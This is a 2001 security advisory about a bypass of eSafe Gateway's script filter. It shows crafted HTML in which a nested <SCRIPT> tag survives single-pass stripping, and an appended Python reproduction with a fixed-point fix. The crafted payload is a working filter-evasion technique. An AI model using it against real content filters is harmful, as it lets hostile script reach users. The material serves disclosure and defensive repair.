eSafe Gateway Script-filtering Bypass Vulnerability
by platon on May 23rd, 2001

eSafe Gateway is a security utility used for filtering internet content...
An HTML file may be crafted to bypass the script-filtering feature offered by eSafe Gateway. This is done by altering the syntax of the <SCRIPT> tag so that the filter's own removal of a nested script element reassembles a valid <SCRIPT> tag in its output. The filtered page therefore still contains the script, which the browser then executes.
EXPLOIT:
This exploit was provided by eDvice:
Details
----------------------
Let's say for example that we want the following HTML code to enter an
organization and the script it contains to be executed:
<HTML><HEAD></HEAD>
<BODY>
<SCRIPT language="JavaScript">
alert("hi");
</SCRIPT>
</BODY></HTML>
If we run this page through eSafe's filtering engine, the script will be
filtered out and the resulting page will contain the following HTML code:
<HTML><HEAD></HEAD>
<BODY>
</BODY></HTML>
However, if we create the following code:
<HTML><HEAD></HEAD>
<BODY>
<SCRIPT<script language="javascript"> </script> language="javascript">
alert("hi");
</SCRIPT>
</BODY></HTML>
Then the inner "<script language="javascript"> </script>" will be extracted
and, since the result is not filtered a second time, we will be left with the
following HTML code, in which the script survives intact:
<HTML><HEAD></HEAD>
<BODY>
<SCRIPT language="javascript">
alert("hi");
</SCRIPT>
</BODY></HTML>
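The following is an added example, not code from the advisory, from eDvice or from the eSafe product; the advisory does not publish eSafe's filtering algorithm, so the single-pass regex stripper below (naive_strip) is an assumed reimplementation of the behaviour described above. It reproduces the bypass on the crafted page, and strip_to_fixpoint shows the minimal fix for this class of bug: re-apply the filter until the output stops changing, and refuse to pass anything through if it does not converge. The sample pages are the two documents from the advisory embedded as constructed test input.

```python
import re

# Constructed sample inputs: the two pages from the advisory text.
PLAIN_SCRIPT = (
    '<HTML><HEAD></HEAD>\n'
    '<BODY>\n'
    '<SCRIPT language="JavaScript">\n'
    'alert("hi");\n'
    '</SCRIPT>\n'
    '</BODY></HTML>'
)

NESTED_SCRIPT = (
    '<HTML><HEAD></HEAD>\n'
    '<BODY>\n'
    '<SCRIPT<script language="javascript"> </script> language="javascript">\n'
    'alert("hi");\n'
    '</SCRIPT>\n'
    '</BODY></HTML>'
)

# Assumed tag matcher: an opening <script ...> tag whose attribute region
# contains no angle brackets, then the shortest run up to a closing tag.
# Because '<' is excluded from the attribute region, the matcher skips the
# broken outer "<SCRIPT<script" opener and locks on to the well-formed
# inner element, which is exactly what the advisory describes.
SCRIPT_RE = re.compile(r"<script\b[^<>]*>.*?</script\s*>",
                       re.IGNORECASE | re.DOTALL)


def naive_strip(html):
    """Single-pass removal (hypothetical model of the vulnerable filter).

    Removes every matched script element once and returns the result
    without looking at it again, so removals that join two fragments into
    a new tag go unnoticed.
    """
    return SCRIPT_RE.sub("", html)


def strip_to_fixpoint(html, max_rounds=10):
    """Hardened variant: filter until the document stops changing.

    Raises ValueError instead of returning if the document is still
    changing after max_rounds, so a pathological input fails closed.
    """
    for _ in range(max_rounds):
        filtered = SCRIPT_RE.sub("", html)
        if filtered == html:
            return filtered
        html = filtered
    raise ValueError("script filter did not converge; refusing to pass page")


def contains_script(html):
    """Post-filter check: does any well-formed script element remain?"""
    return SCRIPT_RE.search(html) is not None


if __name__ == "__main__":
    print("plain page, naive filter, script left:",
          contains_script(naive_strip(PLAIN_SCRIPT)))
    print("crafted page, naive filter, script left:",
          contains_script(naive_strip(NESTED_SCRIPT)))
    print("crafted page, fixpoint filter, script left:",
          contains_script(strip_to_fixpoint(NESTED_SCRIPT)))
```

Running the module shows the naive filter cleaning the plain page but handing back the crafted page with a working <SCRIPT language="javascript"> element, while the fixed-point variant needs a second pass to remove the tag that the first pass assembled. Iterating to a fixed point is the cheapest repair; a stronger design parses the page into a tree and re-serialises only allow-listed elements, so the output can never contain a tag the filter did not itself emit.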